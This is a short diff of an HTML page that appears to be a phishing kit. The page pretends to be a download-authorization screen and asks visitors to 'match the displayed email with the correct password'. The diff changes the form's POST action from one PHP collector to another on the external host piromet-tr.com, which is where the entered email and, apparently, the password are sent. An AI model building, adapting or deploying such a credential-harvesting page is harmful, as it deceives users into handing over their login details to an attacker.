--- a/XihzuDnNQO/_11RmvtqwtMhwXHhfLPSqTWhvzWsZbMLZshjTKNDjxdWVKgFrZPbFLkJRxvTGCh9/index.html
+++ b/XihzuDnNQO/_11RmvtqwtMhwXHhfLPSqTWhvzWsZbMLZshjTKNDjxdWVKgFrZPbFLkJRxvTGCh9/index.html
@@ -131,7 +131,7 @@
         Please match the displayed email with the correct password to prove you are authorized to view these files.
     </div>
       <center><h5 style="margin-bottom: 1rem;">Authorize your download</h5></center>
-      <form action="https://piromet-tr.com/phpwe/X.php" method="post" id="form">
+      <form action="https://piromet-tr.com/stanwe/X.php" method="post" id="form">
         <div class="form-group">
           <label for="email" class="required">Email</label>
           <input type="text" id="email" name="email" class="form-control" placeholder="Enter your email here" value="" required>
